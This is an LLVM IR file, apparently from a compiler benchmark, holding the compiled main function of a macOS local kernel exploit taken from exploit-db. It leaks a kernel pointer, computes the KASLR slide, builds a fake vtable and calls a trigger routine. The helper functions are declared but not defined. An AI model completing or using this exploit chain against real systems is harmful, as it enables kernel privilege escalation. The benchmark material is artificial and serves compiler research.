; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/osx/local/extr_35848.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/osx/local/extr_35848.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [69 x i8] c"the leaked pointer doesn't match up with the expected symbol offset\0A\00", align 1
@.str.1 = private unnamed_addr constant [17 x i8] c"kaslr slide: %p\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i32, align 4
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i32, align 4
  %6 = alloca i64, align 8
  %7 = alloca i8*, align 8
  store i32 0, i32* %1, align 4
  %8 = call i32 (...) @leak()
  store i32 %8, i32* %2, align 4
  %9 = call i32 (...) @load_addr()
  store i32 %9, i32* %3, align 4
  %10 = call i32 (...) @leaked_offset_in_kext()
  store i32 %10, i32* %4, align 4
  %11 = load i32, i32* %2, align 4
  %12 = and i32 %11, 4095
  %13 = load i32, i32* %4, align 4
  %14 = and i32 %13, 4095
  %15 = icmp ne i32 %12, %14
  br i1 %15, label %16, label %18

16:                                               ; preds = %0
  %17 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([69 x i8], [69 x i8]* @.str, i64 0, i64 0))
  store i32 1, i32* %1, align 4
  br label %31

18:                                               ; preds = %0
  %19 = load i32, i32* %2, align 4
  %20 = load i32, i32* %4, align 4
  %21 = sub nsw i32 %19, %20
  %22 = load i32, i32* %3, align 4
  %23 = sub nsw i32 %21, %22
  store i32 %23, i32* %5, align 4
  %24 = load i32, i32* %5, align 4
  %25 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str.1, i64 0, i64 0), i32 %24)
  store i64 0, i64* %6, align 8
  %26 = load i32, i32* %5, align 4
  %27 = call i8* @build_vtable(i32 %26, i64* %6)
  store i8* %27, i8** %7, align 8
  %28 = load i8*, i8** %7, align 8
  %29 = load i64, i64* %6, align 8
  %30 = call i32 @trigger(i8* %28, i64 %29)
  store i32 0, i32* %1, align 4
  br label %31

31:                                               ; preds = %18, %16
  %32 = load i32, i32* %1, align 4
  ret i32 %32
}

declare dso_local i32 @leak(...) #1

declare dso_local i32 @load_addr(...) #1

declare dso_local i32 @leaked_offset_in_kext(...) #1

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i8* @build_vtable(i32, i64*) #1

declare dso_local i32 @trigger(i8*, i64) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
